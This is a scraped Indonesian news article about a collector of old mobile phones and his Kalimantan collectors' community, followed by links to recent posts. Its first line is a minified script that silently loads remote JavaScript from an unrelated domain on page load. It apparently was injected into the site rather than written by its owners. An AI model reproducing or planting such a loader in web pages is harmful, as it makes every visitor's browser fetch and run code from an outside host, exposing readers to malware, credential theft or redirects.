(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kanal

Punya Atau Ingin Miliki Ponsel Tahun Lawas? Gabung di Banua Jadul Community


MARTAPURA, Ponsel alias telepon seluler biasanya dianggap sebagai perangkat ‘sekali pakai’. Sebab, ketika sudah ketinggalan zaman, perangkat tersebut langsung dipensiunkan alias tidak dipakai lagi. Sebagai gantinya, pengguna ponsel akan membeli seri terbaru yang sesuai dengan tren masa terkini.

Namun, hal tersebut tidak berlaku untuk, Kasyaf, Ketua Banua Jadul Community (BJC). Sebab, meski terbilang ketinggalan zaman salah satu kolektor ponsel jadul ini menuturkan, tak ragu untuk selalu membeli dan mengumpulkan ponsel jadul sampai kurang lebih 80 unit di rumahnya selama beberapa tahun terakhir. Siapa sangka di saat orang-orang beralih ke handphone yang lebih canggih alias smart phone, ternyata handphone keluaran lawas atau zaman dulu masih memiliki penggemar tersendiri.

Menurut Kasyaf ketika di temui Kanal Kalimantan, penggemar handphone jadul di Kalsel masih banyak dan berasal dari berbagai kalangan. Terbukti di dalam BJC sejak tahun 2013 hadir, sudah sebanyak 30 orang bergabung di BJC.

Kasyaf yang sudah memulai mengumpulkan handphone jadul sejak tahun 2011 ini mengaku mendapatkan pasokan barang dari teman-teman kolektor dan juga internet, baik dari dalam dan luar negeri.

“Harga tidak merupakan suatu hal yang utama, walaupun mahal sekalian karena sudah merupakan suatu kebutuhan, pasti terbeli,” ujarnya.

Baginya selain disimpan dan di pajang di rumah, juga merupakan suatu bisnis, karena koleksi handphone jadul sangat unik dan menjanjikan.

“Yang saya lihat sih, tidak banyak saingan dan harga yang stabil bahkan cenderung naik,” tuturnya.

Handphone yang kumpulkan dan dijualnya secara online dan offline dari berbagai merk ternama seperti Nokia, Ericson, Siemens, Motorola dan lainnya. “Handphone jadul keluaran tahun 1990-2000-an ke bawah,” ujar Kasyaf.

Kasyaf mengaku Handphone jadul pertama yang dimilikinya adalah Nokia E90 jenis communicator, berkaitan dengan alasan mengapa Kasyaf menjadi kolektor handphone lama, karena ingin menyampaikan hasrat yang dulu tidak pernah kesampaian untuk meliliki ponsel jenis-jenis itu.

“Memiliki ponsel jadul mempunyai tantangan tersediri, selain mencari sparepartnya yang sangat sulit, tempat servisnya pun tak sembarang orang bisa memperbaiki. Perlu pengetahuan yang khusus, sistem akal-akalan pun sering dilakuan untuk mengganti sparpart yang tidak diperjual belikan lagi, dari baterai sampai LCD,” bebernya. (rendy)

Reporter: rendy
Editor: Abi Zarrin Al Ghifari

Desy Arfianty

Recent Posts

Jalinan Erat Silaturahmi Warga Sungai Besar dari Budaya Banjar “Balogo”

KANALKALIMANTAN.COM, BANJARBARU – Suasana riuh diiringi tawa gembira warga baik tua, muda, hingga anak-anak, larut… Read More

11 jam ago

Pelantikan Pengurus Wilayah Keluarga Besar PII Kalsel

KANALKALIMANTAN.COM, BANJARMASIN – 4 Mei diperingati Hari Bangkit (Harba) organisasi pelajar tertua di Tanah Air,… Read More

13 jam ago

Lesti Kejora Hingga Ria Ricis Siap Ramaikan Silet Awards 2024!

KANALKALIMANTAN.COM, - Ajang penghargaan paling dramatis dan paling sensasional yang ditunggu masyarakat, Silet Awards 2024… Read More

14 jam ago

Kontes Motor 2Tak “Entwosiastrokes Volume 2 2024” di Banjarbaru, Ajang Adu Para Modifikator Banua

KANALKALIMANTAN.COM, BANJARBARU - Wali Kota Banjarbaru Aditya Mufti Ariffin mengapreasiasi penyelenggaraan event kontes motor "Entwosiastrokes… Read More

15 jam ago

Kali Pertama Airbus A340 Layani Jemaah Haji Embarkasi Banjarmasin

Penerbangan Kloter 1 Sempat Terlambat 30 Menit Read More

18 jam ago

100 Peserta Ramaikan Kejuaraan Catur se Kalteng Piala Pj Bupati Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Kejuaraan catur piala Pj Bupati Kapuas se Kalimantan Tengah dibuka oleh… Read More

21 jam ago

This website uses cookies.